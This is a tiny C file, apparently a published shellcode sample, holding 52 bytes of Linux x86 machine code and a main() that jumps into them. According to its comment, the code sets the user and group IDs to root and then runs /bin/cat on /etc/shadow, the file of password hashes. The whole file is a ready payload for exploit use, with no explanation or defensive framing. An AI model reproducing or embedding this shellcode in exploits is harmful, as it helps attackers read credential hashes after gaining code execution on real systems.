// linux/x86 setuid(0) + setgid(0) + execve("/bin/cat", "/etc//shadow") - 52 bytes // Febriyanto Nugroho #include <stdio.h> char shellcode[] = "\x6a\x17\x58\xcd\x80\x6a\x2e" "\x58\xcd\x80\x6a\x0b\x58\x99" "\x52\x68\x61\x64\x6f\x77\x68" "\x2f\x2f\x73\x68\x68\x2f\x65" "\x74\x63\x89\xe1\x52\x68\x2f" "\x63\x61\x74\x68\x2f\x62\x69" "\x6e\x89\xe3\x52\x51\x53\x89" "\xe1\xcd\x80"; int main(int argc, char **argv) { asm("jmp %0;" : "=m" (shellcode)); }